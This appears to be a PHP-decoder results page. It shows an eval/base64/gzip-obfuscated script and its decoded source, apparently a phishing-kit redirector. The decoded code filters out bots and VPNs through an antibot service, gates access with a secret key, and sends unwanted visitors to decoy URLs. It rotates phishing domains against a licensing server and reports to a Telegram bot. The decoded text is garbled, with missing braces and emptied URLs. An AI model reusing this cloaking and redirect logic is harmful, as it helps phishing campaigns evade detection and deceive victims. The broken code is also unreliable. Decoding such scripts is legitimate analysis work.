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PHP Decode

<?php error_reporting(0); eval(gzuncompress(base64_decode('eJwNlEWuxQiyRJfTVfLAdE1q9cD..

Decoded Output download

function curll($url)
    $arrContextOptions = [
        "ssl" => ["verify_peer" => false, "verify_peer_name" => false],
    $result = file_get_contents($url, false, stream_context_create($arrContextOptions));
    return $result;

function getip($remote)
    $get_user_ip = curll("" . $remote);
    $ip_to_json = json_decode($get_user_ip);
    if ($ip_to_json->status === 'success') {
        return array($ip_to_json->country, $ip_to_json->countryCode);
    } else {
        $get_user_ip = curll("" . $remote);
        $ip_to_json = json_decode($get_user_ip);
        return array($ip_to_json->geoplugin_countryName, $ip_to_json->geoplugin_countryCode);


function teleg($msg)
    global $bot_token, $chat_id;
    curll("" . $bot_token . "/sendMessage?chat_id=" . $chat_id . "&text=" . $msg . "&disable_web_page_preview=True");


function debug_teleg($msg)
    global $bot_token, $chat_id, $enable_debug;
    if ($enable_debug) {
        curll("" . $bot_token . "/sendMessage?chat_id=" . $chat_id . "&text=" . $msg . "&disable_web_page_preview=True&parse_mode=HTML");


function faker()
    global $root_dir;
    $array = explode("
", file_get_contents($root_dir . "/fakelist.txt"));
    $multiple_url = $array[array_rand($array)];
    header("Location: " . $multiple_url);

function secret_key($p_key, $stwitch_sss)
    if ($stwitch_sss) {
        if (!isset($_GET[$p_key])) {
            return false;
    return true;

function antibot($us_agent, $us_ip)
    global $activated;
    $resutlt = curll("" . $us_ip . "&au=" . $us_agent . "&key=" . $activated);
    $data = json_decode($resutlt, true);
    if (!$data['ok']){
    debug_teleg("blocked! bot/vpn/proxy accessing the page" . blocked_res($us_ip));

function blocked_res($userip)
    return "<pre>Detail: IP=" . $userip . " Country=" . getip($userip)[0] . "</pre>";

function validate_user($user_ip, $user_agent)
    global $url_file, $fuck1, $secret_key_access;

    if (!filter_var($user_ip, FILTER_VALIDATE_IP)) {
        debug_teleg("wrong ip format blocked!" . blocked_res($user_ip));
    } elseif (!trim(file_get_contents($url_file))) {
        debug_teleg("url list is empty!, redirected user" . blocked_res($user_ip));
    } elseif (!secret_key($fuck1, $secret_key_access)) {
        debug_teleg("blocked! access key was not passed" . blocked_res($user_ip));
    } else {
        return true;

function fill_json($file, $key, $value)
    $json = file_get_contents($file);
    $datajson = json_decode($json, true);
    $datajson[$key] = $value;
    file_put_contents($file, json_encode($datajson));

function read_json($file, $key)
    $json = file_get_contents($file);
    $datajson = json_decode($json, true);
    return $datajson[$key];

function task_timer($minutes, $db_file, $key)

    global $root_dir;

    $task_json_array = array(
        'date0' => "",
        'date1' => "",
        "domain" => ""

    if (!file_exists($root_dir . '/task.json')) {
        file_put_contents($root_dir . '/task.json', json_encode($task_json_array));

    $current_time = date('Y-m-d h:i:s', time());
    if (empty(read_json($db_file, $key))) {
        fill_json($db_file, $key, $current_time);

    if ($key == 'date0') {
        if (!file_exists($root_dir . '/cap.html')) {
            return true;

    if ($key == 'date1') {
        if (empty(read_json($db_file, 'domain'))) {
            return true;


    $grab_time = read_json($db_file, $key);
    $task_timer = round((strtotime($current_time) - strtotime($grab_time)) / 60);

    if ($task_timer > $minutes) {
        fill_json($db_file, $key, $current_time);
        return true;


function checker($re, $ug, $c, $a, $u, $r)
    global $checkurl_timer;
    if (validate_user($re, $ug)) {

        if (task_timer($checkurl_timer, $r . '/task.json', 'date1')) {

            foreach (file($u, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $d) {
                $result = curll("https://" . $c . "/auth?domain=" . $d . "&key=" . urlencode($a) . "&host=" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"] . "&v=v_24.0&");
                if ($result == "0") {
                    $domains = [$d];
                    fill_json($r . '/task.json', 'domain', $domains[0]);
                } elseif ($result == "2") {
                    exit('Message me at or email me [email protected] for activation key');
                } elseif ($result == "1") {
                    teleg("this url is bad, Please replace " . $d);
                    $content = file_get_contents($u);
                    $content = str_replace($d, "", $content);
                    file_put_contents($u, $content);
                } else {
                    debug_teleg("unable to perform verifications, please check your hosting");




    } else {


Did this file decode correctly?

Original Code




Function Calls

gzuncompress 2
base64_decode 2
error_reporting 1




MD5 ab497317d6dc063cabce1a550e34d0c0
Eval Count 2
Decode Time 47 ms